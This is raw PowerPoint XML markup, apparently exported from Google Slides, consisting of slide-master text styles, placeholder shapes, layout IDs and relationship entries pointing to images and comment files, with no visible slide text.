          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1140692" y="1452281"/>
            <a:ext cx="6034200" cy="3393000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="o"/>
              <a:defRPr i="0" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="—"/>
              <a:defRPr i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="•"/>
              <a:defRPr i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;8;p1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4738069"/>
            <a:ext cx="9144000" cy="409200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Google Shape;9;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="377569" y="4389764"/>
            <a:ext cx="2796109" cy="1105875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Google Shape;10;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556784" y="4749851"/>
            <a:ext cx="548700" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r">
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>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2"/>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 id="2147483659" r:id="rId13"/>
    <p:sldLayoutId id="2147483660" r:id="rId14"/>
    <p:sldLayoutId id="2147483661" r:id="rId15"/>
    <p:sldLayoutId id="2147483662" r:id="rId16"/>
    <p:sldLayoutId id="2147483663" r:id="rId17"/>
    <p:sldLayoutId id="2147483664" r:id="rId18"/>
    <p:sldLayoutId id="2147483665" r:id="rId19"/>
    <p:sldLayoutId id="2147483666" r:id="rId20"/>
    <p:sldLayoutId id="2147483667" r:id="rId21"/>
    <p:sldLayoutId id="2147483668" r:id="rId22"/>
    <p:sldLayoutId id="2147483669" r:id="rId23"/>
    <p:sldLayoutId id="2147483670" r:id="rId24"/>
    <p:sldLayoutId id="2147483671" r:id="rId25"/>
    <p:sldLayoutId id="2147483672" r:id="rId26"/>
    <p:sldLayoutId id="2147483673" r:id="rId27"/>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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.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10.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.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11.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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12.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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13.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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14.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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15.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/pickle.html" TargetMode="Externa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16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.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17.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.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18.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.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24.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/commen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25.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment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26.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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27.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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28.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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29.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.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30.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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31.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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32.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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33.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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34.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment5.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.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4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4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45.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46.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.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47.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.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48.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.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49.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.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50.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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51.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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52.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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53.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.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54.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.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55.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.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56.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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57.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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58.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59.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.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60.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61.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" 